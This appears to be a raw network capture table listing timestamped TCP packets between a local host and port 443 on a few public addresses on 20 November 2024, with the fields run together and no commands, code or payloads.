                                                                                                                                                                                                Nov 20, 2024 10:54:19.462989092 CET49713443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.462992907 CET4434971313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.463316917 CET49712443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.463325024 CET4434971213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.463918924 CET49712443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.463924885 CET4434971213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.464432001 CET49711443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.464436054 CET4434971113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.464930058 CET49711443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.464934111 CET4434971113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.557893038 CET4434970913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.558064938 CET4434970913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.558146954 CET49709443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.558252096 CET4434971313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.558300018 CET4434971313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.558432102 CET49713443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.560372114 CET4434971213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.560539007 CET4434971213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.560592890 CET49712443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.562289953 CET4434971013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.562376022 CET4434971013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.562429905 CET49710443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.568502903 CET49709443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.568514109 CET4434970913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.568523884 CET49709443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.568528891 CET4434970913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.568852901 CET4434971113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.569010973 CET4434971113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.569056034 CET49711443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.569974899 CET49711443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.569978952 CET4434971113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.569988966 CET49711443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.569992065 CET4434971113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.570941925 CET49713443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.570954084 CET4434971313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.570964098 CET49713443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.570969105 CET4434971313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.572040081 CET49712443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.572052956 CET4434971213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.572077990 CET49712443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.572083950 CET4434971213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.573163986 CET49710443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.573185921 CET4434971013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.573196888 CET49710443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.573204994 CET4434971013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.583482027 CET49714443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.583503008 CET4434971413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.583568096 CET49714443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.585890055 CET49715443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.585910082 CET4434971513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.585959911 CET49715443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.587512970 CET49716443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.587528944 CET4434971613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.587579012 CET49716443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.588037014 CET49714443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.588052988 CET4434971413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.588629007 CET49715443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.588640928 CET4434971513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.588898897 CET49716443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.588910103 CET4434971613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.589705944 CET49717443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.589730978 CET4434971713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.589788914 CET49717443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.589994907 CET49717443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.590009928 CET4434971713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.591214895 CET49718443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.591224909 CET4434971813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.591280937 CET49718443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.591464996 CET49718443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:19.591475964 CET4434971813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.000696898 CET49719443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:20.000736952 CET44349719188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.000813961 CET49719443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:20.004060030 CET49719443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:20.004080057 CET44349719188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.235466957 CET4434971413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.236027956 CET49714443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.236046076 CET4434971413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.236504078 CET49714443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.236509085 CET4434971413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.237987041 CET4434971613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.238249063 CET49716443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.238270044 CET4434971613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.238579035 CET49716443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.238584995 CET4434971613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.248334885 CET4434971813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.248672009 CET49718443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.248680115 CET4434971813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.249027014 CET49718443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.249031067 CET4434971813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.268635988 CET4434971713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.269345045 CET49717443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.269383907 CET4434971713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.269757032 CET49717443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.269764900 CET4434971713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.270258904 CET4434971513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.270529032 CET49715443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.270550013 CET4434971513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.270865917 CET49715443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.270869970 CET4434971513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.343549013 CET4434971413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.343702078 CET4434971413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.343775988 CET49714443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.343957901 CET49714443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.343974113 CET4434971413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.343983889 CET49714443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.343991041 CET4434971413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.347265959 CET49720443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.347372055 CET4434972013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.347491980 CET49720443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.347661972 CET49720443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.347687960 CET4434972013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.348826885 CET4434971613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.348908901 CET4434971613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.348959923 CET49716443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.349029064 CET49716443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.349041939 CET4434971613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.349051952 CET49716443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.349056959 CET4434971613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.351139069 CET49721443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.351186991 CET4434972113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.351304054 CET49721443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.351444960 CET49721443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.351457119 CET4434972113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.361578941 CET4434971813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.361640930 CET4434971813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.361695051 CET49718443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.361835957 CET49718443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.361843109 CET4434971813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.361852884 CET49718443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.361857891 CET4434971813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.364192009 CET49722443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.364221096 CET4434972213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.364304066 CET49722443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.364417076 CET49722443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.364438057 CET4434972213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.380369902 CET4434971713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.380433083 CET4434971713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.380485058 CET49717443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.380655050 CET49717443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.380672932 CET4434971713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.380685091 CET49717443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.380692005 CET4434971713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.382781029 CET49723443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.382817984 CET4434972313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.382925987 CET49723443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.383028984 CET49723443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.383044958 CET4434972313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.384712934 CET4434971513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.384849072 CET4434971513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.384902000 CET49715443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.384932995 CET49715443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.384946108 CET4434971513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.384953976 CET49715443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.384959936 CET4434971513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.386718035 CET49724443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.386739016 CET4434972413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.386807919 CET49724443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.386929989 CET49724443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:20.386940956 CET4434972413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.492358923 CET44349719188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.492455959 CET49719443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:20.495759010 CET49719443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:20.495770931 CET44349719188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.496180058 CET44349719188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.546092033 CET49719443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:20.546109915 CET49719443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:20.546180964 CET44349719188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.578840971 CET49671443192.168.2.7204.79.197.203
                                                                                                                                                                                                Nov 20, 2024 10:54:20.934382915 CET44349719188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.934490919 CET44349719188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.934539080 CET49719443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:20.936070919 CET49719443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:20.936094046 CET44349719188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.936106920 CET49719443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:20.936115026 CET44349719188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.993920088 CET49725443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:20.993947983 CET44349725188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:20.994008064 CET49725443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:20.994370937 CET49725443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:20.994389057 CET44349725188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.011311054 CET4434972013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.011878967 CET49720443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.011929989 CET4434972013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.012327909 CET49720443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.012341976 CET4434972013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.023102999 CET4434972313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.023845911 CET49723443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.023864985 CET4434972313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.024046898 CET49723443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.024054050 CET4434972313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.026946068 CET4434972113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.027303934 CET49721443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.027322054 CET4434972113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.027658939 CET49721443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.027664900 CET4434972113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.045985937 CET4434972213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.046478987 CET49722443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.046529055 CET4434972213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.046937943 CET49722443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.046948910 CET4434972213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.057467937 CET4434972413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.057874918 CET49724443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.057888985 CET4434972413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.058325052 CET49724443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.058330059 CET4434972413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.114290953 CET4434972013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.114394903 CET4434972013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.114455938 CET49720443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.114609957 CET49720443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.114609957 CET49720443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.114629030 CET4434972013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.114649057 CET4434972013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.117619038 CET49726443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.117645025 CET4434972613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.117713928 CET49726443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.117892027 CET49726443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.117902040 CET4434972613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.127521038 CET4434972313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.127574921 CET4434972313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.127614975 CET49723443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.127829075 CET49723443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.127846003 CET4434972313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.127856970 CET49723443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.127862930 CET4434972313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.130636930 CET49727443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.130671978 CET4434972713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.130750895 CET49727443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.130992889 CET49727443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.131009102 CET4434972713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.132882118 CET4434972113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.133018970 CET4434972113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.133140087 CET49721443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.133141041 CET49721443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.133141041 CET49721443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.135541916 CET49728443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.135572910 CET4434972813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.135644913 CET49728443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.135803938 CET49728443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.135832071 CET4434972813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.154169083 CET4434972213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.154228926 CET4434972213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.154279947 CET49722443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.154433012 CET49722443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.154452085 CET4434972213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.154478073 CET49722443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.154495955 CET4434972213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.156765938 CET49729443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.156779051 CET4434972913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.156852007 CET49729443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.157134056 CET49729443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.157144070 CET4434972913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.166845083 CET4434972413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.166909933 CET4434972413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.167005062 CET49724443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.167093039 CET49724443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.167093039 CET49724443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.167104959 CET4434972413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.167114019 CET4434972413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.169507980 CET49730443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.169543982 CET4434973013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.169603109 CET49730443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.169733047 CET49730443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.169749022 CET4434973013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.438335896 CET49721443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.438355923 CET4434972113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.466495991 CET44349725188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.466635942 CET49725443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:21.467952013 CET49725443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:21.467962980 CET44349725188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.468288898 CET44349725188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.469676018 CET49725443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:21.469703913 CET49725443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:21.469764948 CET44349725188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.721419096 CET4434972813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.722007036 CET49728443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.722039938 CET4434972813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.722589016 CET49728443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.722594976 CET4434972813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.735119104 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                Nov 20, 2024 10:54:21.770661116 CET4434972613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.771202087 CET49726443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.771225929 CET4434972613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.771713972 CET49726443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.771719933 CET4434972613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.803901911 CET4434972713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.804491997 CET49727443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.804512024 CET4434972713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.805035114 CET49727443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.805047035 CET4434972713.107.246.45192.168.2.7
